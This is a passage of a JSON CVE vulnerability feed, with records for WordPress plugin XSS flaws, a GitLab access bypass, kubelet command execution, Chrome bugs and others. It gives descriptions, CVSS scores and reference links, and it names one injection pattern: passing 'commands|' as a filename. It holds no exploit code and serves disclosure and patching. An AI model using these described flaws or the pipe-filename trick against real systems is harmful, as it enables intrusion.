"https://www.wordfence.com/threat-intel/vulnerabilities/id/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP User Manager – User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_sidebar' and 'remove_sidebar' functions in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add or remove a Carbon Fields custom sidebar if the Carbon Fields (carbon-fields) plugin is installed." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpusermanager:wp_user_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.9.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-23T04:15Z", "lastModifiedDate" : "2025-02-07T17:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10217", "ASSIGNER" : "security@tibco.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.tibco.com/advisories", "name" : "https://community.tibco.com/advisories", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "XSS Attack in mar.jar, Monitoring Archive Utility (MAR Utility), monitoringconsolecommon.jar in TIBCO Software Inc TIBCO Hawk and TIBCO Operational Intelligence" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-12T20:15Z", "lastModifiedDate" : "2024-11-21T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10218", "ASSIGNER" : "security@tibco.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.tibco.com/advisories", "name" : "https://community.tibco.com/advisories", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "XSS Attack in mar.jar, Monitoring Archive Utility (MAR Utility), monitoringconsolecommon.jar in TIBCO Software Inc TIBCO Hawk and TIBCO Operational Intelligence" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-12T20:15Z", "lastModifiedDate" : "2024-11-22T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10219", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/500134", "name" : "GitLab Issue #500134", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://hackerone.com/reports/2780353", "name" : "HackerOne Bug Bounty Report #2780353", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab CE/EE affecting all versions from 15.6 before 18.0.6, 18.1 before 18.1.4, and 18.2 before 18.2.2 that under certain conditions could have allowed authenticated users to bypass access controls and download private artifacts by accessing specific API endpoints." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "15.6.0", "versionEndExcluding" : "18.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "18.1.0", "versionEndExcluding" : "18.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "18.2.0", "versionEndExcluding" : "18.2.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "15.6.0", "versionEndExcluding" : "18.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "18.1.0", "versionEndExcluding" : "18.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "18.2.0", "versionEndExcluding" : "18.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-08-13T18:15Z", "lastModifiedDate" : "2025-08-14T17:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1022", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing", "name" : "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252291", "name" : "https://vuldb.com/?ctiid.252291", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252291", "name" : "https://vuldb.com/?id.252291", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing", "name" : "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252291", "name" : "https://vuldb.com/?id.252291", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252291", "name" : "https://vuldb.com/?ctiid.252291", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:farahkharrat:simple_student_result_management_system:5.6:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-29T23:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10220", "ASSIGNER" : "security@kubernetes.io" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/11/20/1", "name" : "http://www.openwall.com/lists/oss-security/2024/11/20/1", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/kubernetes/kubernetes/issues/128885", "name" : "https://github.com/kubernetes/kubernetes/issues/128885", "refsource" : "", "tags" : [ ] }, { "url" : "https://groups.google.com/g/kubernetes-security-announce/c/ptNgV5Necko", "name" : "https://groups.google.com/g/kubernetes-security-announce/c/ptNgV5Necko", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes.This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-22T17:15Z", "lastModifiedDate" : "2024-11-22T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10222", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/benbodhi/svg-support/commit/eee3e13b650511c9cc9ee0746be485d031c7c072", "name" : "https://github.com/benbodhi/svg-support/commit/eee3e13b650511c9cc9ee0746be485d031c7c072", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3244181/", "name" : "https://plugins.trac.wordpress.org/changeset/3244181/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/svg-support/#developers", "name" : "https://wordpress.org/plugins/svg-support/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.5.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. By default, this can only be exploited by administrators, but the ability to upload SVG files can be extended to authors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:benbodhi:svg_support:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.5.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2025-02-21T14:15Z", "lastModifiedDate" : "2025-02-24T19:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10223", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/ht-team-member/#developers", "name" : "https://wordpress.org/plugins/ht-team-member/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3177675/", "name" : "https://plugins.trac.wordpress.org/changeset/3177675/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Team – WordPress Team Member Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's htteamember shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-30T07:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10224", "ASSIGNER" : "security@ubuntu.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/rschupp/Module-ScanDeps/security/advisories/GHSA-g597-359q-v529", "name" : "https://github.com/rschupp/Module-ScanDeps/security/advisories/GHSA-g597-359q-v529", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/11/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/11/msg00015.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cve.org/CVERecord?id=CVE-2024-10224", "name" : "https://www.cve.org/CVERecord?id=CVE-2024-10224", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.openwall.com/lists/oss-security/2024/11/19/1", "name" : "https://www.openwall.com/lists/oss-security/2024/11/19/1", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.qualys.com/2024/11/19/needrestart/needrestart.txt", "name" : "https://www.qualys.com/2024/11/19/needrestart/needrestart.txt", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Qualys discovered that if unsanitized input was used with the library Modules::ScanDeps, before version 1.36 a local attacker could possibly execute arbitrary shell commands by open()ing a \"pesky pipe\" (such as passing \"commands|\" as a filename) or by passing arbitrary strings to eval()." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-19T18:15Z", "lastModifiedDate" : "2024-12-03T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10225", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/cd793f83-f122-432b-83e7-1cc8c78817b7", "name" : "https://huntr.com/bounties/cd793f83-f122-432b-83e7-1cc8c78817b7", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in haotian-liu/llava v1.2.0 allows an attacker to cause a Denial of Service (DoS) by appending a large number of characters to the end of a multipart boundary in a file upload request. This causes the server to continuously process each character, rendering the application inaccessible." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hliu:llava:1.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10226", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/arconix-shortcodes/#developers", "name" : "https://wordpress.org/plugins/arconix-shortcodes/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176718/", "name" : "https://plugins.trac.wordpress.org/changeset/3176718/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tychesoftwares:arconix_shortcodes:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.1.14", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T14:15Z", "lastModifiedDate" : "2024-10-31T16:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10227", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/affiliate-toolkit-starter/#developers", "name" : "https://wordpress.org/plugins/affiliate-toolkit-starter/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3174286/", "name" : "https://plugins.trac.wordpress.org/changeset/3174286/", "refsource" : "", "tags" : [ ] }, { "url" : "https://servit.dev/", "name" : "https://servit.dev/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-29T10:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10228", "ASSIGNER" : "security@hashicorp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-732" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-25-vagrant-vmware-utility-installation-files-vulnerable-to-modification-by-unprivileged-user", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-25-vagrant-vmware-utility-installation-files-vulnerable-to-modification-by-unprivileged-user", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Vagrant VMWare Utility Windows installer targeted a custom location with a non-protected path that could be modified by an unprivileged user, introducing potential for unauthorized file system writes. This vulnerability, CVE-2024-10228, was fixed in Vagrant VMWare Utility 1.0.23" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:vagrant_vmware_utility:*:*:*:*:*:windows:*:*", "versionEndExcluding" : "1.0.23", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-29T22:15Z", "lastModifiedDate" : "2024-11-07T17:12Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10229", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "name" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://issues.chromium.org/issues/371011220", "name" : "https://issues.chromium.org/issues/371011220", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Inappropriate implementation in Extensions in Google Chrome prior to 130.0.6723.69 allowed a remote attacker to bypass site isolation via a crafted Chrome Extension. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "130.0.6723.69", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-10-22T22:15Z", "lastModifiedDate" : "2024-10-25T17:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1023", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:1662", "name" : "RHSA-2024:1662", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1706", "name" : "RHSA-2024:1706", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2088", "name" : "RHSA-2024:2088", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2833", "name" : "RHSA-2024:2833", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3527", "name" : "RHSA-2024:3527", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3989", "name" : "RHSA-2024:3989", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4884", "name" : "RHSA-2024:4884", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-1023", "name" : "https://access.redhat.com/security/cve/CVE-2024-1023", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260840", "name" : "RHBZ#2260840", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/issues/5078", "name" : "https://github.com/eclipse-vertx/vert.x/issues/5078", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/pull/5080", "name" : "https://github.com/eclipse-vertx/vert.x/pull/5080", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/pull/5082", "name" : "https://github.com/eclipse-vertx/vert.x/pull/5082", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/pull/5082", "name" : "https://github.com/eclipse-vertx/vert.x/pull/5082", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/pull/5080", "name" : "https://github.com/eclipse-vertx/vert.x/pull/5080", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/eclipse-vertx/vert.x/issues/5078", "name" : "https://github.com/eclipse-vertx/vert.x/issues/5078", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2260840", "name" : "RHBZ#2260840", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-1023", "name" : "https://access.redhat.com/security/cve/CVE-2024-1023", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:4884", "name" : "RHSA-2024:4884", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3989", "name" : "RHSA-2024:3989", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:3527", "name" : "RHSA-2024:3527", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2833", "name" : "RHSA-2024:2833", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2088", "name" : "RHSA-2024:2088", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1706", "name" : "RHSA-2024:1706", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:1662", "name" : "RHSA-2024:1662", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T08:15Z", "lastModifiedDate" : "2024-11-25T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10230", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-843" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "name" : "https://chromereleases.googleblog.com/2024/10/stable-channel-update-for-desktop_22.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://issues.chromium.org/issues/371565065", "name" : "https://issues.chromium.org/issues/371565065", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Type Confusion in V8 in Google Chrome prior to 130.0.6723.69 allowed a remote attacker to potentially exploit heap corruption via a 